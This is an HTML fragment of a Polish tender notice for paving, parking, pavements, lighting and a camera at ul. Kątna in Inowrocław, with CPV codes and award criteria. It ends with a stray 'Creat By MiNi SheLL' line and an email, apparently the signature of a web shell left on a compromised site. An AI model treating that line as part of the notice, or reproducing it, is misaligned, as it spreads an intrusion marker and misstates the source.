<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> UTWARDZENIE NAWIERZCHNI POD POJEMNIKI DO SELEKTYWNEJ ZBIÓRKI ODPADÓW KOMUNALNYCH WRAZ Z WYKONANIEM DRÓG DOJAZDOWYCH I MIEJSC POSTOJOWYCH PRZY UL. KĄTNEJ W INOWROCŁAWIU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cz. 4 ul. Kątna, lokalizacja 1 i 2:
a) lokalizacja 1: zamówienie obejmuje wykonanie:
- zjazdu z ul. Kątnej,
- 9 stanowisk parkingowych dostępnych z ul. Kątnej,
- placu o wymiarach 5,0x6,0m pod pojemniki do selektywnej zbiórki odpadów komunalnych - nawierzchnia z kostki brukowej betonowej gr. 8 cm na podbudowie z betonu o grubości 15 cm - na jezdniach kostka szara, na placu pod kontenery - czerwona, na parkingach - antracytowa z wyróżnieniem stanowisk kostką białą lub żółtą;
- chodnika o długości ok. 42m o nawierzchni z kostki brukowej betonowej szarej gr. 6 cm na podbudowie z betonu 12 cm,
- naprawy nawierzchni z kostki na ul. Kątnej na styku wykonywanych robót,
- krawężników i obrzeży na ławie betonowej z oporem,
- regulacji kratek ściekowych, pokryw studni, skrzynek zaworów,
- rekultywacji terenów zielonych, 
- oznakowania drogowego.
b) lokalizacja 2:  zamówienie obejmuje wykonanie:
- zjazdu z ul. Kątnej,
- 5 stanowisk parkingowych dostępnych z ul. Kątnej,
- placu o wymiarach 15,0x5,0m pod pojemniki do selektywnej zbiórki odpadów komunalnych;
 - nawierzchnia z kostki brukowej betonowej gr. 8 cm na podbudowie z betonu o grubości 15 cm - na jezdniach kostka szara, na placu pod kontenery - czerwona, na parkingach - antracytowa z wyróżnieniem stanowisk kostką białą lub żółtą;
- chodnika o długości ok. 16m o nawierzchni z kostki brukowej betonowej szarej gr. 6 cm na podbudowie z betonu 12 cm,
- naprawy nawierzchni z kostki brukowej w ul. Kątnej na styku wykonywanych robót,
- krawężników i obrzeży na ławie betonowej z oporem,
- regulacji  urządzeń obcych,
- rekultywacji terenów zielonych, 
- oznakowania drogowego.
Wspólnie dla obydwu lokalizacji należy wykonać 4 nowe latarnie oraz 1 kamerę monitoringu
Do wykonawcy należy załatwienie w imieniu Zamawiającego spraw formalnych oraz poniesienie ewentualnych kosztów  związanych z prowadzeniem robót w zasięgu uzbrojenia podziemnego (zgodnie z uzgodnieniami gestorów).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.13.00-1, 45.23.31.20-6, 45.23.32.00-1, 45.31.61.10-9, 45.23.32.90-8, 35.12.53.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95.00</li>
<li>2. okres rękojmi za wady i gwarancji jakości - 5.00</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com